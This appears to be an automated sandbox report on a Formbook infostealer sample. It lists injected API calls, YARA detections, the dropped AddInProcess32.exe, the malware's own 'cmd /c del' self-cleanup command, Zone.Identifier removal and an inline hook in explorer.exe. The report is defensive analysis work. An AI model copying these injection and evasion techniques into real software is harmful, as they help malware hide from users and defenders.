Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D96D0 NtCreateKey,LdrInitializeThunk,	7_2_047D96D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9710 NtQueryInformationToken,LdrInitializeThunk,	7_2_047D9710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,	7_2_047D9FE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9780 NtMapViewOfSection,LdrInitializeThunk,	7_2_047D9780
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_047D9860
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9840 NtDelayExecution,LdrInitializeThunk,	7_2_047D9840
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_047D9910
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D99A0 NtCreateSection,LdrInitializeThunk,	7_2_047D99A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A50 NtCreateFile,LdrInitializeThunk,	7_2_047D9A50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9560 NtWriteFile,	7_2_047D9560
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DAD30 NtSetContextThread,	7_2_047DAD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9520 NtWaitForSingleObject,	7_2_047D9520
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D95F0 NtQueryInformationFile,	7_2_047D95F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9670 NtQueryInformationProcess,	7_2_047D9670
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9610 NtEnumerateValueKey,	7_2_047D9610
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DA770 NtOpenThread,	7_2_047DA770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9770 NtSetInformationFile,	7_2_047D9770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9760 NtOpenProcess,	7_2_047D9760
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9730 NtQueryVirtualMemory,	7_2_047D9730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DA710 NtOpenProcessToken,	7_2_047DA710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D97A0 NtUnmapViewOfSection,	7_2_047D97A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DB040 NtSuspendThread,	7_2_047DB040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9820 NtEnumerateKey,	7_2_047D9820
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D98F0 NtReadVirtualMemory,	7_2_047D98F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D98A0 NtWriteVirtualMemory,	7_2_047D98A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9950 NtQueueApcThread,	7_2_047D9950
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D99D0 NtCreateProcessEx,	7_2_047D99D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A20 NtResumeThread,	7_2_047D9A20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A10 NtQuerySection,	7_2_047D9A10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A00 NtProtectVirtualMemory,	7_2_047D9A00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9A80 NtOpenDirectoryObject,	7_2_047D9A80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9B00 NtSetValueKey,	7_2_047D9B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047DA3B0 NtGetContextThread,	7_2_047DA3B0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9D70 NtCreateFile,	7_2_003E9D70
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9E20 NtReadFile,	7_2_003E9E20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9EA0 NtClose,	7_2_003E9EA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9F50 NtAllocateVirtualMemory,	7_2_003E9F50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E9E1A NtReadFile,	7_2_003E9E1A

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B7C9A8	0_2_00B7C9A8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B7EBD2	0_2_00B7EBD2
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B7D4A2	0_2_00B7D4A2
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B76E20	0_2_00B76E20
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B72648	0_2_00B72648
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B767E8	0_2_00B767E8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_00B79F20	0_2_00B79F20
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C2790	0_2_069C2790
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C0788	0_2_069C0788
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C85F0	0_2_069C85F0
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069CCE38	0_2_069CCE38
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C1F91	0_2_069C1F91
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C2780	0_2_069C2780
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C0778	0_2_069C0778
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069CCE28	0_2_069CCE28
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C7C10	0_2_069C7C10
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 0_2_069C7C48	0_2_069C7C48
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041D25B	1_2_0041D25B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00402D8B	1_2_00402D8B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00409E40	1_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_009E2050	1_2_009E2050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01330D20	1_2_01330D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01401D55	1_2_01401D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01354120	1_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133F900	1_2_0133F900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01402D07	1_2_01402D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014025DD	1_2_014025DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362581	1_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134D5E0	1_2_0134D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134841F	1_2_0134841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1002	1_2_013F1002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FD466	1_2_013FD466
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013620A0	1_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134B090	1_2_0134B090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014028EC	1_2_014028EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014020A8	1_2_014020A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01402B28	1_2_01402B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136EBB0	1_2_0136EBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01401FF1	1_2_01401FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FDBD2	1_2_013FDBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01356E30	1_2_01356E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01402EF7	1_2_01402EF7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014022AE	1_2_014022AE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047A841F	7_2_047A841F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485D466	7_2_0485D466
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04790D20	7_2_04790D20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048625DD	7_2_048625DD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04862D07	7_2_04862D07
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AD5E0	7_2_047AD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04861D55	7_2_04861D55
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C2581	7_2_047C2581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B6E30	7_2_047B6E30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04862EF7	7_2_04862EF7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485D616	7_2_0485D616
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0486DFCE	7_2_0486DFCE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04861FF1	7_2_04861FF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048620A8	7_2_048620A8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048628EC	7_2_048628EC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04851002	7_2_04851002
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0486E824	7_2_0486E824
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047C20A0	7_2_047C20A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047AB090	7_2_047AB090
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047B4120	7_2_047B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0479F900	7_2_0479F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048622AE	7_2_048622AE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0485DBD2	7_2_0485DBD2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_048503DA	7_2_048503DA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_04862B28	7_2_04862B28
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047CEBB0	7_2_047CEBB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003D2D90	7_2_003D2D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003D2D8B	7_2_003D2D8B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003D9E40	7_2_003D9E40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003D2FB0	7_2_003D2FB0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B

Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0479B150 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0133B150 appears 35 times

Source: bXFjrxjRlb.exe	Binary or memory string: OriginalFilename vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSHCore1.dll0 vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.356213090.000000000256A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPe6.dll" vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.360888475.00000000056E0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe, 00000000.00000002.355982660.00000000008CB000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs bXFjrxjRlb.exe
Source: bXFjrxjRlb.exe	Binary or memory string: OriginalFilenameIMG_155710.exeL vs bXFjrxjRlb.exe

Source: bXFjrxjRlb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/2@5/3

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bXFjrxjRlb.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to behavior

Source: bXFjrxjRlb.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: bXFjrxjRlb.exe	Virustotal: Detection: 27%
Source: bXFjrxjRlb.exe	ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\bXFjrxjRlb.exe 'C:\Users\user\Desktop\bXFjrxjRlb.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: bXFjrxjRlb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: bXFjrxjRlb.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: cscript.pdbUGP source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: AddInProcess32.pdb source: AddInProcess32.exe, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, cscript.exe
Source:	Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000002.402103553.00000000009E2000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: cscript.pdb source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp

Data Obfuscation:

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041781D push ebp; ret	1_2_0041783E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00417963 push FFFFFFE1h; iretd	1_2_00417970
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041712C push es; retf	1_2_00417136
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041EAB0 pushad ; retf	1_2_0041EAB1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041E41F push dword ptr [42F9B798h]; ret	1_2_0041E446
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041CEC5 push eax; ret	1_2_0041CF18
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041CF7C push eax; ret	1_2_0041CF82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041CF12 push eax; ret	1_2_0041CF18
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0041CF1B push eax; ret	1_2_0041CF82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0138D0D1 push ecx; ret	1_2_0138D0E4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047ED0D1 push ecx; ret	7_2_047ED0E4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E781D push ebp; ret	7_2_003E783E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E712C push es; retf	7_2_003E7136
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003E7963 push FFFFFFE1h; iretd	7_2_003E7970
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003EEAB0 pushad ; retf	7_2_003EEAB1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003EE41F push dword ptr [42F9B798h]; ret	7_2_003EE446
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003ECEC5 push eax; ret	7_2_003ECF18
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003ECF1B push eax; ret	7_2_003ECF82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003ECF12 push eax; ret	7_2_003ECF18
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_003ECF7C push eax; ret	7_2_003ECF82

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

File opened: C:\Users\user\Desktop\bXFjrxjRlb.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xEA

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
